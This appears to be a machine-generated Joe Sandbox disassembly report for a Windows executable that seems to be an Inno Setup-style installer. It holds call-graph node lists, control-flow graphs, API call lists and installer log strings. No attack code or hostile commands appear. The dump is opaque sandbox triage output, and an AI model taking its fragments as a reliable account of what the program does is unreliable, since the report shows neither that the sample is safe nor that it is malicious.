LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56661->56677 56662->56661 56663->56661 56664->56661 56665->56617 56666->56615 56667->56615 56668->56643 56675->56661 56676->56661 56677->56661 56678->56652 56680 47efd8 56681 47efe1 56680->56681 56684 47f00c 56680->56684 56683 47effe 56681->56683 56681->56684 56682 47f04b 56685 47f05e 56682->56685 56686 47f06b 56682->56686 57089 4756fc 188 API calls 56683->57089 56684->56682 57091 47d9dc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56684->57091 56689 47f062 56685->56689 56690 47f0a0 56685->56690 56692 47f085 56686->56692 56693 47f074 56686->56693 56695 47f066 56689->56695 56701 47f0e3 56689->56701 56702 47f0fe 56689->56702 56698 47f0c4 56690->56698 56699 47f0a9 56690->56699 56691 47f003 56691->56684 57090 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56691->57090 57094 47dbe8 42 API calls 56692->57094 57093 47db78 42 API calls 56693->57093 56694 47f03e 57092 47db78 42 API calls 56694->57092 56708 47f127 56695->56708 56709 47f145 56695->56709 57096 47dbe8 42 API calls 56698->57096 57095 47dbe8 42 API calls 56699->57095 57097 47dbe8 42 API calls 56701->57097 57098 47dbe8 42 API calls 56702->57098 56711 47f13c 56708->56711 57099 47db78 42 API calls 56708->57099 57101 47d874 24 API calls 56709->57101 57100 47d874 24 API calls 56711->57100 56712 47f143 56715 47f155 56712->56715 56716 47f15b 56712->56716 56717 47f159 56715->56717 56814 47db54 56715->56814 56716->56717 56718 47db54 42 API calls 56716->56718 56819 47b154 56717->56819 56718->56717 57112 47d508 42 API calls 56814->57112 56816 47db6f 57113 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56816->57113 56820 42d864 GetWindowsDirectoryA 56819->56820 56821 47b172 56820->56821 56822 403450 4 API calls 56821->56822 56823 47b17f 56822->56823 56824 42d890 GetSystemDirectoryA 56823->56824 56825 47b187 56824->56825 56826 403450 4 API calls 56825->56826 56827 47b194 56826->56827 56828 42d8bc 6 API calls 56827->56828 56829 47b19c 56828->56829 56830 403450 4 API calls 56829->56830 56831 47b1a9 56830->56831 56832 47b1b2 56831->56832 56833 47b1ce 56831->56833 57134 42d1d4 56832->57134 56835 403400 4 API calls 56833->56835 56837 47b1cc 56835->56837 56839 47b213 56837->56839 56841 42c898 5 API calls 56837->56841 56838 403450 4 API calls 56838->56837 57114 47afdc 56839->57114 56843 47b1ee 56841->56843 56845 403450 4 API calls 56843->56845 56844 403450 4 API calls 56846 47b22f 56844->56846 56847 47b1fb 56845->56847 56848 47b24d 56846->56848 56850 4035c0 4 API calls 56846->56850 56847->56839 56849 403450 4 API calls 56847->56849 56851 47afdc 8 API calls 56848->56851 56849->56839 56850->56848 56852 47b25c 56851->56852 56853 403450 4 API calls 56852->56853 56854 47b269 56853->56854 56855 47b291 56854->56855 56857 42c40c 5 API calls 56854->56857 56856 47b2f8 56855->56856 56861 47afdc 8 API calls 56855->56861 56858 47b27f 56857->56858 57089->56691 57091->56694 57092->56682 57093->56695 57094->56695 57095->56695 57096->56695 57097->56695 57098->56695 57099->56711 57100->56712 57101->56712 57112->56816 57115 42dd44 RegOpenKeyExA 57114->57115 57116 47b002 57115->57116 57117 47b006 57116->57117 57118 47b028 57116->57118 57119 42dc74 6 API calls 57117->57119 57120 403400 4 API calls 57118->57120 57121 47b012 57119->57121 57122 47b02f 57120->57122 57123 47b01d RegCloseKey 57121->57123 57124 403400 4 API calls 57121->57124 57122->56844 57123->57122 57124->57123 57135 4038a4 4 API calls 57134->57135 57137 42d1e7 57135->57137 57136 42d1fe GetEnvironmentVariableA 57136->57137 57138 42d20a 57136->57138 57137->57136 57141 42d211 57137->57141 57144 42daf8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57137->57144 57140 403400 4 API calls 57138->57140 57140->57141 57141->56838 57144->57137 58634 3101070 58635 310107c 58634->58635 58637 3101084 58634->58637 58636 3101092 58637->58636 58640 45cff4 58637->58640 58641 45d003 58640->58641 58642 45d037 VirtualAlloc 58641->58642 58646 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58641->58646 58644 45d04f 58642->58644 58645 45d032 58645->58642 58646->58645 58647 416420 58648 416432 58647->58648 58649 416472 GetClassInfoA 58648->58649 58667 408d34 19 API calls 58648->58667 58650 41649e 58649->58650 58652 4164c0 RegisterClassA 58650->58652 58653 4164b0 UnregisterClassA 58650->58653 58657 4164f9 58650->58657 58655 4164e8 58652->58655 58652->58657 58653->58652 58654 41646d 58654->58649 58656 408cc4 5 API calls 58655->58656 58656->58657 58658 416516 58657->58658 58659 416527 58657->58659 58658->58657 58660 408cc4 5 API calls 58658->58660 58668 40754c 58659->58668 58660->58659 58664 416540 58665 41a1f8 5 API calls 58664->58665 58666 41654a 58665->58666 58667->58654 58669 407550 58668->58669 58670 40755a 58668->58670 58671 402660 4 API calls 58669->58671 58672 418394 7 API calls 58670->58672 58671->58670 58672->58664 58673 49706c 58731 403344 58673->58731 58675 49707a 58734 4056a0 58675->58734 58677 49707f 58737 406334 GetModuleHandleA GetProcAddress 58677->58737 58683 49708e 58754 410964 58683->58754 58685 497093 58758 412938 58685->58758 59004 4032fc 58731->59004 58733 403349 GetModuleHandleA GetCommandLineA 58733->58675 58736 4056db 58734->58736 59005 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58734->59005 58736->58677 58738 406350 58737->58738 58739 406357 GetProcAddress 58737->58739 58738->58739 58740 406366 58739->58740 58741 40636d GetProcAddress 58739->58741 58740->58741 58742 406380 58741->58742 58743 40637c SetProcessDEPPolicy 58741->58743 58744 409954 58742->58744 58743->58742 59006 40902c 58744->59006 58749 408728 7 API calls 58750 409977 58749->58750 59021 409078 GetVersionExA 58750->59021 58753 409b88 6F541CD0 58753->58683 58755 41096e 58754->58755 58756 4109ad GetCurrentThreadId 58755->58756 58757 4109c8 58756->58757 58757->58685 59023 40af0c 58758->59023 58762 412964 59004->58733 59005->58736 59007 408cc4 5 API calls 59006->59007 59008 40903d 59007->59008 59009 4085e4 GetSystemDefaultLCID 59008->59009 59013 40861a 59009->59013 59010 408570 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 59010->59013 59011 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 59011->59013 59012 406df4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 59012->59013 59013->59010 59013->59011 59013->59012 59014 40867c 59013->59014 59015 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 59014->59015 59016 406df4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 59014->59016 59017 408570 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 59014->59017 59018 4086ff 59014->59018 59015->59014 59016->59014 59017->59014 59019 403420 4 API calls 59018->59019 59020 408719 59019->59020 59020->58749 59022 40908f 59021->59022 59022->58753 59024 40af13 59023->59024 59024->59024 59025 40af32 59024->59025 59034 40ae44 19 API calls 59024->59034 59027 41101c 59025->59027 59028 41103e 59027->59028 59029 406df4 5 API calls 59028->59029 59030 403450 4 API calls 59028->59030 59031 41105d 59028->59031 59029->59028 59030->59028 59032 403400 4 API calls 59031->59032 59033 411072 59032->59033 59033->58762 59034->59024 60368 41ee64 60369 41ee73 IsWindowVisible 60368->60369 60370 41eea9 60368->60370 60369->60370 60371 41ee7d IsWindowEnabled 60369->60371 60371->60370 60372 41ee87 60371->60372 60373 402648 4 API calls 60372->60373 60374 41ee91 EnableWindow 60373->60374 60374->60370 60375 41fb68 60376 41fb71 60375->60376 60379 41fe0c 60376->60379 60378 41fb7e 60380 41fefe 60379->60380 60381 41fe23 60379->60381 60380->60378 60381->60380 60400 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 60381->60400 60383 41fe59 60384 41fe83 60383->60384 60385 41fe5d 60383->60385 60410 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 60384->60410 60401 41fbac 60385->60401 60389 41fe91 60390 41fe95 60389->60390 60391 41febb 60389->60391 60393 41fbac 10 API calls 60390->60393 60394 41fbac 10 API calls 60391->60394 60392 41fbac 10 API calls 60395 41fe81 60392->60395 60396 41fea7 60393->60396 60397 41fecd 60394->60397 60395->60378 60398 41fbac 10 API calls 60396->60398 60399 41fbac 10 API calls 60397->60399 60398->60395 60399->60395 60400->60383 60402 41fbc7 60401->60402 60403 41fbdd 60402->60403 60404 41f94c 4 API calls 60402->60404 60411 41f94c 60403->60411 60404->60403 60406 41fc25 60407 41fc48 SetScrollInfo 60406->60407 60419 41faac 60407->60419 60410->60389 60412 4181f0 60411->60412 60413 41f969 GetWindowLongA 60412->60413 60414 41f9a6 60413->60414 60415 41f986 60413->60415 60431 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 60414->60431 60430 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 60415->60430 60418 41f992 60418->60406 60420 41faba 60419->60420 60421 41fac2 60419->60421 60420->60392 60422 41fb01 60421->60422 60423 41faf1 60421->60423 60429 41faff 60421->60429 60433 417e58 IsWindowVisible ScrollWindow SetWindowPos 60422->60433 60432 417e58 IsWindowVisible ScrollWindow SetWindowPos 60423->60432 60426 41fb41 GetScrollPos 60426->60420 60427 41fb4c 60426->60427 60428 41fb5b SetScrollPos 60427->60428 60428->60420 60429->60426 60430->60418 60431->60418 60432->60429 60433->60429 60434 4205a8 60435 4205bb 60434->60435 60455 415b40 60435->60455 60437 420702 60438 420719 60437->60438 60462 4146e4 KiUserCallbackDispatcher 60437->60462 60439 420730 60438->60439 60463 414728 KiUserCallbackDispatcher 60438->60463 60445 420752 60439->60445 60464 420070 12 API calls 60439->60464 60440 420661 60460 420858 20 API calls 60440->60460 60441 4205f6 60441->60437 60441->60440 60448 420652 MulDiv 60441->60448 60446 42067a 60446->60437 60461 420070 12 API calls 60446->60461 60459 41a314 LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 60448->60459 60451 420697 60452 4206b3 MulDiv 60451->60452 60453 4206d6 60451->60453 60452->60453 60453->60437 60454 4206df MulDiv 60453->60454 60454->60437 60456 415b52 60455->60456 60465 414480 60456->60465 60458 415b6a 60458->60441 60459->60440 60460->60446 60461->60451 60462->60438 60463->60439 60464->60445 60466 41449a 60465->60466 60469 410658 60466->60469 60468 4144b0 60468->60458 60472 40dea4 60469->60472 60471 41065e 60471->60468 60473 40df06 60472->60473 60474 40deb7 60472->60474 60479 40df14 60473->60479 60477 40df14 19 API calls 60474->60477 60478 40dee1 60477->60478 60478->60471 60480 40df24 60479->60480 60482 40df3a 60480->60482 60491 40d7e0 60480->60491 60511 40e29c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 60480->60511 60494 40e14c 60482->60494 60485 40d7e0 5 API calls 60486 40df42 60485->60486 60486->60485 60487 40dfae 60486->60487 60497 40dd60 60486->60497 60489 40e14c 5 API calls 60487->60489 60490 40df10 60489->60490 60490->60471 60512 40ec08 60491->60512 60520 40d6bc 60494->60520 60498 40e154 5 API calls 60497->60498 60499 40dd93 60498->60499 60500 40eb6c 5 API calls 60499->60500 60501 40dd9e 60500->60501 60502 40eb6c 5 API calls 60501->60502 60503 40dda9 60502->60503 60504 40ddc4 60503->60504 60505 40ddbb 60503->60505 60510 40ddc1 60503->60510 60529 40dbd8 60504->60529 60532 40dcc8 19 API calls 60505->60532 60508 403420 4 API calls 60509 40de8f 60508->60509 60509->60486 60510->60508 60511->60480 60515 40d980 60512->60515 60517 40d98b 60515->60517 60516 40d7ea 60516->60480 60517->60516 60519 40d9cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 60517->60519 60519->60517 60521 40ec08 5 API calls 60520->60521 60522 40d6c9 60521->60522 60523 40d6dc 60522->60523 60527 40ed0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 60522->60527 60523->60486 60525 40d6d7 60528 40d658 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 60525->60528 60527->60525 60528->60523 60533 40ad7c 19 API calls 60529->60533 60531 40dc00 60531->60510 60532->60510 60533->60531 60534 440be8 60535 440bf1 60534->60535 60536 440bff WriteFile 60534->60536 60535->60536 60537 440c0a 60536->60537 60538 40ce34 60541 406f18 WriteFile 60538->60541 60542 406f35 60541->60542 60543 4222f4 60544 422303 60543->60544 60549 421284 60544->60549 60547 422323 60550 4212f3 60549->60550 60563 421293 60549->60563 60553 421304 60550->60553 60574 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 60550->60574 60552 421332 60556 4213a5 60552->60556 60561 42134d 60552->60561 60553->60552 60555 4213ca 60553->60555 60554 4213a3 60557 4213f6 60554->60557 60576 421e3c 11 API calls 60554->60576 60555->60554 60558 4213de SetMenu 60555->60558 60556->60554 60564 4213b9 60556->60564 60577 4211cc 10 API calls 60557->60577 60558->60554 60561->60554 60567 421370 GetMenu 60561->60567 60562 4213fd 60562->60547 60572 4221f8 10 API calls 60562->60572 60563->60550 60573 408d34 19 API calls 60563->60573 60566 4213c2 SetMenu 60564->60566 60566->60554 60568 421393 60567->60568 60569 42137a 60567->60569 60575 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 60568->60575 60571 42138d SetMenu 60569->60571 60571->60568 60572->60547 60573->60563 60574->60553 60575->60554 60576->60557 60577->60562 60578 3102127 60579 3102130 60578->60579 60580 310210a 60579->60580 60581 45cff4 5 API calls 60579->60581 60581->60580 60582 44acfc 60583 44ad0a 60582->60583 60585 44ad29 60582->60585 60584 44abe0 11 API calls 60583->60584 60583->60585 60584->60585 60586 447f7c 60587 447fb1 60586->60587 60588 447faa 60586->60588 60589 447fd0 60587->60589 60590 447fba 60587->60590 60591 403400 4 API calls 60588->60591 60593 403494 4 API calls 60589->60593 60632 447d80 7 API calls 60590->60632 60594 44815b 60591->60594 60596 447fde 60593->60596 60595 447fc5 60595->60589 60597 447fc9 60595->60597 60598 4037b8 4 API calls 60596->60598 60597->60588 60599 447ffa 60598->60599 60600 4037b8 4 API calls 60599->60600 60601 448016 60600->60601 60601->60588 60602 44802a 60601->60602 60603 4037b8 4 API calls 60602->60603 60604 448044 60603->60604 60605 431424 4 API calls 60604->60605 60606 448066 60605->60606 60607 4314f4 4 API calls 60606->60607 60614 448086 60606->60614 60607->60606 60608 4480dc 60621 441b88 60608->60621 60609 4480c4 60609->60608 60634 442e24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60609->60634 60613 448110 GetLastError 60635 447d14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60613->60635 60614->60609 60633 442e24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60614->60633 60616 44811f 60636 442e64 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60616->60636 60618 448134 60637 442e74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60618->60637 60620 44813c 60622 442b66 60621->60622 60623 441bc1 60621->60623 60625 403400 4 API calls 60622->60625 60624 403400 4 API calls 60623->60624 60626 441bc9 60624->60626 60627 442b7b 60625->60627 60628 431424 4 API calls 60626->60628 60627->60613 60629 441bd5 60628->60629 60630 442b56 60629->60630 60638 441260 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60629->60638 60630->60613 60632->60595 60633->60614 60634->60608 60635->60616 60636->60618 60637->60620 60638->60629 60639 47ef3e 60640 450664 5 API calls 60639->60640 60641 47ef52 60640->60641 60642 47e064 21 API calls 60641->60642 60643 47ef76 60642->60643 60644 40d07c 60645 40d084 60644->60645 60646 40d0b2 60645->60646 60647 40d0a7 60645->60647 60651 40d0ae 60645->60651 60649 40d0b6 60646->60649 60650 40d0c8 60646->60650 60657 4062a0 GlobalHandle GlobalUnlock GlobalFree 60647->60657 60656 406274 GlobalAlloc GlobalLock 60649->60656 60658 406284 GlobalHandle GlobalUnlock GlobalReAlloc GlobalLock 60650->60658 60654 40d0c4 60654->60651 60655 408cc4 5 API calls 60654->60655 60655->60651 60656->60654 60657->60651 60658->60654 60659 4165fc 73A15CF0
                                                                                            Strings
                                                                                            • Version of existing file: %u.%u.%u.%u, xrefs: 0046FB60
                                                                                            • Dest file is protected by Windows File Protection., xrefs: 0046F8D1
                                                                                            • Non-default bitness: 64-bit, xrefs: 0046F893
                                                                                            • Installing the file., xrefs: 0046FEED
                                                                                            • @, xrefs: 0046F794
                                                                                            • Incrementing shared file count (64-bit)., xrefs: 00470549
                                                                                            • Will register the file (a type library) later., xrefs: 004704D0
                                                                                            • Skipping due to "onlyifdestfileexists" flag., xrefs: 0046FEDE
                                                                                            • Time stamp of our file: %s, xrefs: 0046F97F
                                                                                            • Non-default bitness: 32-bit, xrefs: 0046F89F
                                                                                            • -- File entry --, xrefs: 0046F6DF
                                                                                            • Will register the file (a DLL/OCX) later., xrefs: 004704DC
                                                                                            • Dest file exists., xrefs: 0046F99F
                                                                                            • Uninstaller requires administrator: %s, xrefs: 00470159
                                                                                            • Failed to strip read-only attribute., xrefs: 0046FEB7
                                                                                            • Couldn't read time stamp. Skipping., xrefs: 0046FD19
                                                                                            • Version of our file: (none), xrefs: 0046FAE0
                                                                                            • Installing into GAC, xrefs: 004706D1
                                                                                            • Skipping due to "onlyifdoesntexist" flag., xrefs: 0046F9B2
                                                                                            • Existing file is protected by Windows File Protection. Skipping., xrefs: 0046FDD0
                                                                                            • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 0046FC99
                                                                                            • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 0046FCA8
                                                                                            • , xrefs: 0046FBB3, 0046FD84, 0046FE02
                                                                                            • Stripped read-only attribute., xrefs: 0046FEAB
                                                                                            • Incrementing shared file count (32-bit)., xrefs: 00470562
                                                                                            • Existing file has a later time stamp. Skipping., xrefs: 0046FDB3
                                                                                            • Dest filename: %s, xrefs: 0046F878
                                                                                            • Time stamp of our file: (failed to read), xrefs: 0046F98B
                                                                                            • Existing file is a newer version. Skipping., xrefs: 0046FBE6
                                                                                            • Same version. Skipping., xrefs: 0046FCC9
                                                                                            • .tmp, xrefs: 0046FF9B
                                                                                            • InUn, xrefs: 00470129
                                                                                            • Same time stamp. Skipping., xrefs: 0046FD39
                                                                                            • Version of existing file: (none), xrefs: 0046FCDE
                                                                                            • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 0046FCB4
                                                                                            • User opted not to overwrite the existing file. Skipping., xrefs: 0046FE31
                                                                                            • Time stamp of existing file: (failed to read), xrefs: 0046FA1B
                                                                                            • Version of our file: %u.%u.%u.%u, xrefs: 0046FAD4
                                                                                            • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0046FE7A
                                                                                            • Time stamp of existing file: %s, xrefs: 0046FA0F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                            • API String ID: 0-4021121268
                                                                                            • Opcode ID: 39296d02e86210ba95a122c72ed18eadff40a57c25b7f45ff7f5bcbf2b67098f
                                                                                            • Instruction ID: cb3b5b092a3a8f8c122efd66c5c5c6ee12dad63ca724b3077347a87130114cb0
                                                                                            • Opcode Fuzzy Hash: 39296d02e86210ba95a122c72ed18eadff40a57c25b7f45ff7f5bcbf2b67098f
                                                                                            • Instruction Fuzzy Hash: 9B928234A04288DFCB11DFA5D445BDDBBB1AF05304F5480ABE884BB392D7789E49CB5A

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1530 42dfc4-42dfd5 1531 42dfe0-42e005 AllocateAndInitializeSid 1530->1531 1532 42dfd7-42dfdb 1530->1532 1533 42e1af-42e1b7 1531->1533 1534 42e00b-42e028 GetVersion 1531->1534 1532->1533 1535 42e041-42e043 1534->1535 1536 42e02a-42e03f GetModuleHandleA GetProcAddress 1534->1536 1537 42e045-42e053 CheckTokenMembership 1535->1537 1538 42e06a-42e084 GetCurrentThread OpenThreadToken 1535->1538 1536->1535 1539 42e191-42e1a7 FreeSid 1537->1539 1540 42e059-42e065 1537->1540 1541 42e086-42e090 GetLastError 1538->1541 1542 42e0bb-42e0e3 GetTokenInformation 1538->1542 1540->1539 1543 42e092-42e097 call 4031bc 1541->1543 1544 42e09c-42e0af GetCurrentProcess OpenProcessToken 1541->1544 1545 42e0e5-42e0ed GetLastError 1542->1545 1546 42e0fe-42e122 call 402648 GetTokenInformation 1542->1546 1543->1533 1544->1542 1549 42e0b1-42e0b6 call 4031bc 1544->1549 1545->1546 1550 42e0ef-42e0f9 call 4031bc * 2 1545->1550 1556 42e130-42e138 1546->1556 1557 42e124-42e12e call 4031bc * 2 1546->1557 1549->1533 1550->1533 1561 42e13a-42e13b 1556->1561 1562 42e16b-42e189 call 402660 CloseHandle 1556->1562 1557->1533 1566 42e13d-42e150 EqualSid 1561->1566 1562->1539 1569 42e152-42e15f 1566->1569 1570 42e167-42e169 1566->1570 1569->1570 1572 42e161-42e165 1569->1572 1570->1562 1570->1566 1572->1562
                                                                                            APIs
                                                                                            • AllocateAndInitializeSid.ADVAPI32(00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DFFE
                                                                                            • GetVersion.KERNEL32(00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E01B
                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E034
                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E03A
                                                                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E04F
                                                                                            • FreeSid.ADVAPI32(00000000,0042E1AF,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E1A2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                                            • API String ID: 2252812187-1888249752
                                                                                            • Opcode ID: de8d44d672a8929b680763389e92ce8a04460e4e95b38bd413b506cbd288daf1
                                                                                            • Instruction ID: 81e9a68d7eb5b753086264e3ea48cb09d3699a943d7b2bc0788aba7922d59162
                                                                                            • Opcode Fuzzy Hash: de8d44d672a8929b680763389e92ce8a04460e4e95b38bd413b506cbd288daf1
                                                                                            • Instruction Fuzzy Hash: DE51B271B40625AEEB10EAF69C42BBF77ACDB09704F54047BB900F7282D5BC89158A69

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1860 423c1c-423c50 1861 423c52-423c53 1860->1861 1862 423c84-423c9b call 423b78 1860->1862 1863 423c55-423c71 call 40b44c 1861->1863 1868 423cfc-423d01 1862->1868 1869 423c9d 1862->1869 1893 423c73-423c7b 1863->1893 1894 423c80-423c82 1863->1894 1872 423d03 1868->1872 1873 423d37-423d3c 1868->1873 1870 423ca3-423ca6 1869->1870 1871 423d60-423d70 1869->1871 1874 423cd5-423cd8 1870->1874 1875 423ca8 1870->1875 1878 423d72-423d77 1871->1878 1879 423d7b-423d83 call 4241a4 1871->1879 1881 423fc1-423fc9 1872->1881 1882 423d09-423d11 1872->1882 1876 423d42-423d45 1873->1876 1877 4240aa-4240b8 IsIconic 1873->1877 1887 423db9-423dc0 1874->1887 1888 423cde-423cdf 1874->1888 1883 423e06-423e16 call 423b94 1875->1883 1884 423cae-423cb1 1875->1884 1885 4240e6-4240fb call 424860 1876->1885 1886 423d4b-423d4c 1876->1886 1889 424162-42416a 1877->1889 1896 4240be-4240c9 GetFocus 1877->1896 1891 423d88-423d90 call 4241ec 1878->1891 1892 423d79-423d9c call 423b94 1878->1892 1879->1889 1881->1889 1890 423fcf-423fda call 4181f0 1881->1890 1897 423f23-423f4a SendMessageA 1882->1897 1898 423d17-423d1c 1882->1898 1883->1889 1900 423cb7-423cba 1884->1900 1901 423e2e-423e4a PostMessageA call 423b94 1884->1901 1885->1889 1911 423d52-423d55 1886->1911 1912 4240fd-424104 1886->1912 1887->1889 1903 423dc6-423dcd 1887->1903 1904 423ce5-423ce8 1888->1904 1905 423f4f-423f56 1888->1905 1910 424181-424187 1889->1910 1890->1889 1945 423fe0-423fef call 4181f0 IsWindowEnabled 1890->1945 1891->1889 1892->1889 1893->1910 1894->1862 1894->1863 1896->1889 1899 4240cf-4240d8 call 41f004 1896->1899 1897->1889 1907 423d22-423d23 1898->1907 1908 42405a-424065 1898->1908 1899->1889 1956 4240de-4240e4 SetFocus 1899->1956 1919 423cc0-423cc3 1900->1919 1920 423eb5-423ebc 1900->1920 1901->1889 1903->1889 1924 423dd3-423dd9 1903->1924 1925 423cee-423cf1 1904->1925 1926 423e4f-423e6f call 423b94 1904->1926 1905->1889 1935 423f5c-423f61 call 404e54 1905->1935 1928 424082-42408d 1907->1928 1929 423d29-423d2c 1907->1929 1908->1889 1931 42406b-42407d 1908->1931 1932 424130-424137 1911->1932 1933 423d5b 1911->1933 1922 424106-424119 call 4244e4 1912->1922 1923 42411b-42412e call 42453c 1912->1923 1938 423cc9-423cca 1919->1938 1939 423dde-423dec IsIconic 1919->1939 1940 423ebe-423ed1 call 423b24 1920->1940 1941 423eef-423f00 call 423b94 1920->1941 1922->1889 1923->1889 1924->1889 1943 423cf7 1925->1943 1944 423e1b-423e29 call 424188 1925->1944 1974 423e93-423eb0 call 423a94 PostMessageA 1926->1974 1975 423e71-423e8e call 423b24 PostMessageA 1926->1975 1928->1889 1952 424093-4240a5 1928->1952 1949 423d32 1929->1949 1950 423f66-423f6e 1929->1950 1931->1889 1947 42414a-424159 1932->1947 1948 424139-424148 1932->1948 1951 42415b-42415c call 423b94 1933->1951 1935->1889 1957 423cd0 1938->1957 1958 423da1-423da9 1938->1958 1964 423dfa-423e01 call 423b94 1939->1964 1965 423dee-423df5 call 423bd0 1939->1965 1989 423ee3-423eea call 423b94 1940->1989 1990 423ed3-423edd call 41ef68 1940->1990 1994 423f02-423f08 call 41eeb4 1941->1994 1995 423f16-423f1e call 423a94 1941->1995 1943->1951 1944->1889 1945->1889 1991 423ff5-424004 call 4181f0 IsWindowVisible 1945->1991 1947->1889 1948->1889 1949->1951 1950->1889 1971 423f74-423f7b 1950->1971 1982 424161 1951->1982 1952->1889 1956->1889 1957->1951 1958->1889 1976 423daf-423db4 call 422c5c 1958->1976 1964->1889 1965->1889 1971->1889 1973 423f81-423f90 call 4181f0 IsWindowEnabled 1971->1973 1973->1889 2005 423f96-423fac call 412320 1973->2005 1974->1889 1975->1889 1976->1889 1982->1889 1989->1889 1990->1989 1991->1889 2012 42400a-424055 GetFocus call 4181f0 SetFocus 